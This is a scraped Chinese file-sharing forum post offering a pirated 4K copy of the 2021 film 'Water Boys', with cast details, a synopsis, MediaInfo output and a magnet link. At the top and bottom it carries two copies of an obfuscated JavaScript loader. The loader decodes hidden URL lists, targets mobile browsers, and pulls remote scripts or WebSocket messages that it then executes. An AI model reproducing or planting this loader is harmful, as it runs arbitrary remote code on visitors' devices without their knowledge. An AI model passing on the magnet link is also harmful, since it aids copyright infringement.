五个扑水的少年[国语配音/中文字幕].Water.Boys.2021.2160p.WEB-DL.60fps.H265.10bit.DDP5.1 5.52GB

版主小s 24天前 148

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 五个扑水的少年 / 五个扑水的少年中国版 / Water Boys

◎年 代 2021

◎产 地 中国大陆

◎类 别 喜剧 / 运动

◎语 言 汉语普通话

◎上映日期 2021-10-01(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt15163768/

◎豆瓣评分 7.3/10 (78309人评价)

◎豆瓣链接 https://movie.douban.com/subject/35030151/

◎片 长 111分钟

◎导 演 宋灏霖 Haolin Song (id:1362183)

◎编 剧 缪倩 Qian Miu (id:1362184)

宋灏霖 Haolin Song (id:1362183)

◎演 员 辛云来 Yunlai Xin (id:1397178)

冯祥琨 Xiangkun Feng (id:1437063)

李孝谦 Xiaoqian Li (id:1437065)

吴俊霆 Junting Wu (id:1459586)

王川 Chuan Wang (id:1455080)

辛柏青 Baiqing Xin (id:1021293)

代乐乐 Lele Dai (id:1275749)

衣云鹤 Yunhe Yi (id:1350228)

缪纪君 (id:1460277)

吴一逊 (id:1438362)

寇孑 Jie Kou (id:1461474)

孙永焕 Yonghuan Sun (id:1426832)

唐汉霄 Hanxiao Tang (id:1339299)

李然 Ran Li (id:1449187)

◎标 签 青春 / 成长 / 夏天 / 游泳 / 运动 / 喜剧 / 中国大陆 / 2021

◎简 介

在我们普通的青春里,最疯狂的高光时刻会是什么?张伟(辛云来 饰)是一个长相普通、成绩中游的高二学生,是老师和妈妈眼中的「差生」。面对多方打压,他也渐渐对自己失去了信心,直到意外被任命为学校组建的男子花样游泳队队长,他一点点被改变……从来没有被人相信过的他面对队友高飞(李孝谦 饰)、陈铭涵(冯祥琨 饰)、蛐蛐(王川 饰)、王子(吴俊霆 饰)的信任,第一次有了想要赢一次的想法。为了心中重燃的热血,少年们决定一起迎接这场“男子花样游泳”的青春反击战……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 301818550086654016263900069537197178143 (0xE310236A24412218EE44EBF94D85BD1F)

  4. Complete name : 五个扑水的少年[email protected]DQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.52 GiB

  8. Duration : 1 h 50 min

  9. Overall bit rate : 7 172 kb/s

  10. Encoded date : UTC 2021-11-08 05:20:29

  11. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 50 min

  20. Bit rate : 6 722 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 512 pixels

  23. Display aspect ratio : 2.540

  24. Frame rate mode : Constant

  25. Frame rate : 60.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.019

  30. Stream size : 5.18 GiB (94%)

  31. Default : Yes

  32. Forced : No

  33. Color range : Limited

  34. Color primaries : BT.709

  35. Transfer characteristics : BT.709

  36. Matrix coefficients : BT.709


  37. Audio #1

  38. ID : 2

  39. Format : AAC LC

  40. Format/Info : Advanced Audio Codec Low Complexity

  41. Codec ID : A_AAC-2

  42. Duration : 1 h 50 min

  43. Bit rate : 192 kb/s

  44. Channel(s) : 2 channels

  45. Channel layout : L R

  46. Sampling rate : 44.1 kHz

  47. Frame rate : 43.066 FPS (1024 SPF)

  48. Compression mode : Lossy

  49. Stream size : 150 MiB (3%)

  50. Language : Chinese

  51. Default : Yes

  52. Forced : No


  53. Audio #2

  54. ID : 3

  55. Format : E-AC-3

  56. Format/Info : Enhanced AC-3

  57. Commercial name : Dolby Digital Plus

  58. Codec ID : A_EAC3

  59. Duration : 1 h 50 min

  60. Bit rate mode : Constant

  61. Bit rate : 256 kb/s

  62. Channel(s) : 6 channels

  63. Channel layout : L R C LFE Ls Rs

  64. Sampling rate : 48.0 kHz

  65. Frame rate : 31.250 FPS (1536 SPF)

  66. Compression mode : Lossy

  67. Stream size : 202 MiB (4%)

  68. Language : Chinese

  69. Service kind : Complete Main

  70. Default : Yes

  71. Forced : No




复制代码


TAGS 喜剧 运动

磁力链:
  • magnet:?xt=urn:btih:A10545ED223C497D436987A60099D7D4F1097B9F

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};